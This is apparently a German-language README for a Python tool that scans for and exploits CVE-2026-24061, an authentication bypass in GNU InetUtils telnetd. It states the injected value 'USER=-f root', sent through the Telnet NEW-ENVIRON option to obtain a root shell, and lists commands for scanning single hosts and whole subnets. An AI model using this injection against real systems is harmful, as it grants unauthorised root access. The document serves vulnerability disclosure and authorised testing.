
CVE-2026-24061 — GNU InetUtils Telnetd Authentifizierungsumgehungs-Scanner
Ein Python-basierter Sicherheitsscanner, der CVE-2026-24061 erkennt und ausnutzt, eine kritische (CVSS 9.8) Authentifizierungsumgehungsschwachstelle in GNU InetUtils telnetd Versionen 1.9.3 bis 2.7.
Der Scanner injiziert über die Telnet NEW-ENVIRON-Option (RFC 1572) einen bösartigen Wert USER=-f root und täuscht den Server so, dass er die Authentifizierung überspringt und eine Root-Shell gewährt.
id-Befehl# Scan single target
sudo python3 telnetd_scanner.py -t 192.168.56.101 -p 23 -v
# Scan entire subnet
sudo python3 telnetd_scanner.py -t 192.168.56.0/24 --threads 30
# Save report
sudo python3 telnetd_scanner.py -t 192.168.56.101 -o report.txt
# JSON output
sudo python3 telnetd_scanner.py -t 192.168.56.101 --format json -o report.json
| Software | Verwundbar | Behoben |
|---|---|---|
| GNU InetUtils telnetd | <= 2.7 | >= 2.8 |
Dieses Tool ist ausschließlich für autorisierte Sicherheitsforschung und Bildungszwecke bestimmt. Verwenden Sie es nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
Ahmad Sadeeq